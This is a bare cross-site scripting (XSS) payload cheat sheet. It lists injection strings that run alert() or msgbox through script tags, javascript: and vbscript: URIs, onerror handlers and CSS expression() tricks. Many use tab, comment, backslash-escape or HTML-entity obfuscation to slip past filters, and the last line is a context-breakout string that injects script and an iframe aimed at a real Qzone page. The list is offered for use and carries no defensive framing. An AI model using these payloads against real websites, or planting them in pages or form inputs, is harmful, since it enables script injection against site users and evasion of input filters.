<script>alert("跨站")</script> (most commonly used)
<img src=javascript:alert("跨站")></img>
<img src="javascript: alert(/跨站/)"></img>
<img src="javas[tab]cript:alert(/跨站/)" width=150></img> ([tab] marks whitespace produced with the Tab key)
<img src="#" onerror=alert(/跨站/)></img>
<img src="#" style="xss:expression(alert(/xss/));"></img>
<img src="#"/* */onerror=alert(/xss/) width=150></img> (/**/ denotes a comment)
<img src=vbscript:msgbox ("xss")></img>
<style> input {left:expression (alert('xss'))}</style>
<div style={left:expression (alert('xss'))}></div>
<div style={left:exp/* */ression (alert('xss'))}></div>
<div style={left:\0065\0078ression (alert('xss'))}></div>
HTML entity: <div style={left:&#x0065;xpression (alert('xss'))}></div>
Unicode: <div style="{left:expRessioN (alert('xss'))}">
"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["